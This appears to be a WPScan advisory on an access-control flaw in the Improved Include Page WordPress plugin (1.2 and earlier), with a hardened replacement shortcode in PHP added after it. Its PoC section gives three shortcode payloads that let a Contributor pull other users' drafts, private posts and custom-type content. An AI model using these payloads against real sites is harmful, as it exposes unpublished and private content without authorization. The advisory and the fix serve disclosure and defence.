wpvulndb | Francesco Carlucci | WPVDB-ID: AB857454-7C7C-454D-9C7F-1DB767961E5F
History: Nov 15, 2021 - 12:00 a.m.

Improved Include Page <= 1.2 - Contributor+ Arbitrary Posts/Pages Access

2021-11-15 00:00:00
Francesco Carlucci
wpscan.com
Tags: improved include page, contributor access, arbitrary content access, shortcode attributes, post type, post status

EPSS: 0.001 (Percentile: 32.8%)

The plugin's shortcode accepts post_type and post_status attributes, which can be used to retrieve arbitrary content regardless of its type or status. As a result, users with a role as low as Contributor can gain access to content they are not supposed to see.

PoC

[include-page allowtype="post" allowstatus="draft" id="131"]
[include-page allowtype="post" allowstatus="private" id="132"]
[include-page allowtype="custom-post-type" allowstatus="any" id="{ID}"]
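For comparison, here is how an include-by-id shortcode can be written so that the viewer's capabilities, not shortcode attributes, decide what gets rendered. This is an added example and not the Improved Include Page plugin's code; the shortcode tag hardened-include-page and the function name hardened_include_page_shortcode are hypothetical, while every function it calls (shortcode_atts, get_post, is_post_type_viewable, current_user_can, post_password_required, apply_filters, add_shortcode) is WordPress core.

```php
<?php
/**
 * Added example, not the plugin's own code: a hardened include-by-id shortcode.
 * The shortcode tag and function name are hypothetical; all calls are WP core.
 */

function hardened_include_page_shortcode( $atts ) {
    // Only "id" is accepted. post_type / post_status are deliberately not
    // taken from attributes, so the author of the post carrying the shortcode
    // cannot widen the lookup to drafts, private posts or other post types.
    $atts = shortcode_atts( array( 'id' => 0 ), $atts, 'hardened-include-page' );
    $id   = absint( $atts['id'] );
    if ( ! $id ) {
        return '';
    }

    $post = get_post( $id );
    if ( ! $post ) {
        return '';
    }

    // Refuse post types that are not meant to be shown on the front end at all.
    if ( ! is_post_type_viewable( $post->post_type ) ) {
        return '';
    }

    // Defer to core's capability mapping for the *viewer*: published posts are
    // readable by everyone, private posts require read_private_posts (or
    // authorship), and drafts/pending posts map to edit_post, which a
    // Contributor does not hold for other users' posts.
    if ( ! current_user_can( 'read_post', $post->ID ) ) {
        return '';
    }

    // Honour password protection the same way the front end does.
    if ( post_password_required( $post ) ) {
        return '';
    }

    // Guard against a post including itself (directly or via a chain).
    static $in_progress = array();
    if ( isset( $in_progress[ $post->ID ] ) ) {
        return '';
    }
    $in_progress[ $post->ID ] = true;
    $content = apply_filters( 'the_content', $post->post_content );
    unset( $in_progress[ $post->ID ] );

    return $content;
}
add_shortcode( 'hardened-include-page', 'hardened_include_page_shortcode' );
```

The check is made against the user who is viewing the page, which is the right actor: a Contributor previewing their own post that embeds someone else's draft gets nothing, while an Editor viewing the same post does see it. Note that `read_post` only maps through core's status-aware logic for post types registered with `map_meta_cap` enabled; for other custom post types `current_user_can( 'read_post', ... )` checks a primitive capability that is rarely granted, which fails closed rather than open.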

